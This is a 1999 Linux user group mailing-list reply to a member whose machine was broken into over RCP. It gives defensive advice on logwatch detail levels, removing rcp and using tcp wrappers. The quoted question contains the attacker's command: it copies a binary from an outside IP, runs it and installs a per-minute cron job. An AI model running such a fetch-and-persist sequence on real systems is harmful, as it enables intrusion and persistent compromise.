[OLUG] RCP
Vincent Raffensberger
vraffensberger at csm.edu
Tue Dec 14 18:11:22 UTC 1999
Todd wrote:
>
> Can anyone tell me how to stop RCP access to my Linux box, and if there are
> any security tools available to monitor a RCP connection. On December 11
> someone gained access and perfomed the following to my machine:
> rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> I currently am running logwatch and uwatch, but this connection did not
> show up in either. Any suggestions would be welcomed.
>
> -------------------------------------------------------------------------
There are a few things you can do about this.
First of all edit the settings in /etc/log.d/logwatch.conf and make the
detail level at least "8". This should show most events like this. If
that dosen't work you can further customize the settings.
If you're not using rcp and don't plan to, you can delete or move the
binary.
You should also setup tcp wrappers to "deny all" and only allow
necessary services to specific addresses.
My /etc/hosts.deny is "ALL: ALL" and here's what my /etc/hosts.allow is:
in.ftpd: ALL
sshd: ALL except PARANOID
httpd: ALL
webmin: 3.2.1.0/255.255.255.0
Now you have to worry about what else they've done....
--
Vincent Raffensberger College of Saint Mary
Network Administrator 1901 S. 72nd. St.
402-399-2433 Omaha, NE 68124
-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm. http://olug.bstc.net/
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`
More information about the OLUG
mailing list